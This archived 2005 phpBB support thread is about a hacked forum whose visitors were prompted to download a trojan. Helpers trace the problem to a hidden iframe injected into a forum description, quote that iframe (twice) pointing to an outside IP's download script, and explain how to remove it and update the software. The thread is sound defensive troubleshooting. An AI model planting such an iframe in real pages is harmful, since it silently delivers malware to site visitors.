Trojan Downloader

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
DjMaSt3r
Registered User
Posts: 19
Joined: Sun Mar 20, 2005 5:19 pm

Trojan Downloader

Post by DjMaSt3r »

My users are having problems with my forum because it keeps trying to download a trojan from 195.95.218.173

It's called newexpl

The warning I get is as follows:

You have chosen to open newexpl.php which is a : RFC-822 data from: http://195.95.218.173 What should Firefox do with this file? (Firefox being my browser of choice).

-----------------
www.techgadgets4free.com/index.php
Sphen
Registered User
Posts: 524
Joined: Wed May 19, 2004 5:06 pm
Location: Land of the Beaver
Contact:

Post by Sphen »

Sorry, but I don't get what's happening. Are users being prompted to download this while browsing your forum? If so, it's possible that your forum was compromised. Find out what pages this is happening on, and see if there was any code that might have been added which would do this.

Hope this helps :D

Sphen
I think, therefore I am, I think...
My previous posts are under the name "UberSphen"
DjMaSt3r
Registered User
Posts: 19
Joined: Sun Mar 20, 2005 5:19 pm

Post by DjMaSt3r »

Users are prompted to download it (at least in firefox they are)

It only happens when they click the forum button to go to the forums.

The forums are located here... www.techgadgets4free.com/index.php
Sphen
Registered User
Posts: 524
Joined: Wed May 19, 2004 5:06 pm
Location: Land of the Beaver
Contact:

Post by Sphen »

I have a question for you. Do you use any JavaScript code, specifically a postamble(); function?

I took a quick look through your HTML output, and that looked a little odd.

Sphen
I think, therefore I am, I think...
My previous posts are under the name "UberSphen"
NeoThermic
Security Consultant
Posts: 2141
Joined: Thu Dec 25, 2003 1:33 am
Location: United Kingdom
Contact:

Post by NeoThermic »

Ok, checking your forum and the sourcecode of the generated pages, your forum entitled 'Got Questions? Ask Here!!' is the infected one.

You need to go to your admin pannel, into 'Forum Admin', 'Management', and click 'Edit' for that forum.

In the 'Description' field, you'll see this:

Code: Select all

If you have any questions feel free to ask...but please keep it appropriate. ;)<iframe src="http://195.95.218.173/dl/adv439.php" style="display:none"></iframe>
Remove the stuff startng at <iframe, and click 'update'.

Then I suggest that you make sure your phpBB version is up to date (2.0.16 as of typing this)

NeoThermic
NeoThermic.com... a well of information. Ask me for the bit bucket so you can drink its goodness. ||新熱です
Gary C
Registered User
Posts: 3
Joined: Mon Jul 11, 2005 3:11 am
Location: Virginia Beach, VA
Contact:

Post by Gary C »

I had the same problem on two of my websites. On one site, the index.php was modified. on the other site, it was the index.shtml. In both cases, one line of iframe code was inserted. removing the lines solves the loading issues similar to that described here. and i just now patched both boards to version 16.

Were the OP's site and my sites caught up in some rash of phpbb exploitations? or do i have a larger security problem?
Last edited by Gary C on Mon Jul 11, 2005 5:36 am, edited 1 time in total.
User avatar
Anon
Former Team Member
Posts: 7019
Joined: Fri Jan 02, 2004 7:33 am
Location: Christchurch, New Zealand

Post by Anon »

Gary C wrote: I had the same problem on two of my websites. On one site, the index.php was modified. on the site, it was the index.shtml. In both cases, one line of iframe code was inserted. removing the lines solves the loading issues similar to that described here. and i just now patched both boards to version 16.

Were the OP's site and my sites caught up in some rash of phpbb exploitations? or do i have a larger security problem?


Sounds like someone used the login bypass hack to get into the admin panel and insert download code into the forum description. Always keep up to date with releases, as they will incluce security fixes. This applies to other software too, not just phpBB, but Apache. MySQL, PHP etc
DjMaSt3r
Registered User
Posts: 19
Joined: Sun Mar 20, 2005 5:19 pm

Post by DjMaSt3r »

NeoThermic wrote: Ok, checking your forum and the sourcecode of the generated pages, your forum entitled 'Got Questions? Ask Here!!' is the infected one.

You need to go to your admin pannel, into 'Forum Admin', 'Management', and click 'Edit' for that forum.

In the 'Description' field, you'll see this:

Code: Select all

If you have any questions feel free to ask...but please keep it appropriate. ;)<iframe src="http://195.95.218.173/dl/adv439.php" style="display:none"></iframe>
Remove the stuff startng at <iframe, and click 'update'.

Then I suggest that you make sure your phpBB version is up to date (2.0.16 as of typing this)

NeoThermic



That was it, you're awesome :-D

Thanks everyone for the help
Gary C
Registered User
Posts: 3
Joined: Mon Jul 11, 2005 3:11 am
Location: Virginia Beach, VA
Contact:

Post by Gary C »

Anon wrote: Sounds like someone used the login bypass hack to get into the admin panel and insert download code into the forum description. Always keep up to date with releases, as they will incluce security fixes. This applies to other software too, not just phpBB, but Apache. MySQL, PHP etc


that doesn't explain how they could modify the index.shtml. index.php, i'll buy, but not index.shtml.
User avatar
Anon
Former Team Member
Posts: 7019
Joined: Fri Jan 02, 2004 7:33 am
Location: Christchurch, New Zealand

Post by Anon »

If it was 2.0.10 or earlier it could well have been the highlight eploit that accesses all files
Gary C
Registered User
Posts: 3
Joined: Mon Jul 11, 2005 3:11 am
Location: Virginia Beach, VA
Contact:

Post by Gary C »

When the files were modified (Jun 30) I was running 2.0.11 and 2.0.15 on the two boards. The root index.shtml was modified on the site running 2.0.11. The root index.php was modified on the site running 2.0.15.
Brighid
Registered User
Posts: 37
Joined: Sat Feb 12, 2005 7:10 am
Contact:

Post by Brighid »

So will you be marking this topic as [SOLVED]?
Locked

Return to “2.0.x Support Forum”

cron